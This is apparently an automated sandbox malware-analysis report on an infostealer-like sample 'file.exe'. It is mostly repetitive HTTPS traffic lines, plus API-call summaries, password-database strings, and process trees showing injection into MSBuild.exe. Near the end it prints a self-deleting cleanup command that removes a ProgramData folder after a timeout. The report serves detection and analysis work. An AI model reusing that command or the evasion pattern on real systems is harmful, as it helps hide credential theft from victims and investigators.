Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57211
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57213
Source: unknown Network traffic detected: HTTP traffic on port 57174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57218
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57214
Source: unknown Network traffic detected: HTTP traffic on port 57234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57216
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57217
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57100
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57221
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57222
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57223
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57103
Source: unknown Network traffic detected: HTTP traffic on port 57128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57224
Source: unknown Network traffic detected: HTTP traffic on port 57074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57220
Source: unknown Network traffic detected: HTTP traffic on port 57200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57229
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57109
Source: unknown Network traffic detected: HTTP traffic on port 57256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57225
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57226
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57227
Source: unknown Network traffic detected: HTTP traffic on port 57233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57107
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57228
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57234
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57114
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57235
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57230
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57231
Source: unknown Network traffic detected: HTTP traffic on port 57035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57119
Source: unknown Network traffic detected: HTTP traffic on port 57052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57115
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57236
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57116
Source: unknown Network traffic detected: HTTP traffic on port 57140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57237
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57118
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57239
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57122
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57124
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57125
Source: unknown Network traffic detected: HTTP traffic on port 57211 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57246
Source: unknown Network traffic detected: HTTP traffic on port 57024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57240
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57120
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57241
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57242
Source: unknown Network traffic detected: HTTP traffic on port 57267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57287 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57096
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57099
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57093
Source: unknown Network traffic detected: HTTP traffic on port 57075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57095
Source: unknown Network traffic detected: HTTP traffic on port 57098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57091
Source: unknown Network traffic detected: HTTP traffic on port 57276 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57149 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57207 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57229 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57263 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57160 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57049
Source: unknown Network traffic detected: HTTP traffic on port 57254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57219 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57057
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57059
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57176
Source: unknown Network traffic detected: HTTP traffic on port 57159 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57051
Source: unknown Network traffic detected: HTTP traffic on port 57136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57172
Source: unknown Network traffic detected: HTTP traffic on port 57033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57067
Source: unknown Network traffic detected: HTTP traffic on port 57022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57188
Source: unknown Network traffic detected: HTTP traffic on port 57286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57189
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57065
Source: unknown Network traffic detected: HTTP traffic on port 57183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57180
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57062
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57183
Source: unknown Network traffic detected: HTTP traffic on port 57265 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57275 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57199
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57079
Source: unknown Network traffic detected: HTTP traffic on port 57021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57075
Source: unknown Network traffic detected: HTTP traffic on port 57182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57196
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57197
Source: unknown Network traffic detected: HTTP traffic on port 57044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57077
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57070
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57191
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57073
Source: unknown Network traffic detected: HTTP traffic on port 57077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57194
Source: unknown Network traffic detected: HTTP traffic on port 57220 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:57016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.202:443 -> 192.168.2.4:57019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57213 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 1_2_00411F55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 1_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CACED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 1_2_6CACED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CB0B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB0B8C0 rand_s,NtQueryVirtualMemory, 1_2_6CB0B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 1_2_6CB0B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CAAF280
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CADCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CAE94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004104E7 appears 38 times
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: String function: 00307A10 appears 51 times
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: String function: 00334BC8 appears 97 times
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: String function: 00336AA8 appears 171 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005B7A10 appears 51 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 304
Source: file.exe Static PE information: invalid certificate
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: .data ZLIB complexity 0.9919345953525641
Source: GCGHCBKFCF.exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9911276223776224
Source: a43486128347[1].exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9911276223776224
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/37@13/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 1_2_6CB07030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_004114A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear, 1_2_00411807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\V9HM2KPN.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Command line argument: MZx 8_2_003020AD
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: AKJDGD.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 30%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\GCGHCBKFCF.exe "C:\ProgramData\GCGHCBKFCF.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAKFIJDHJEGI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
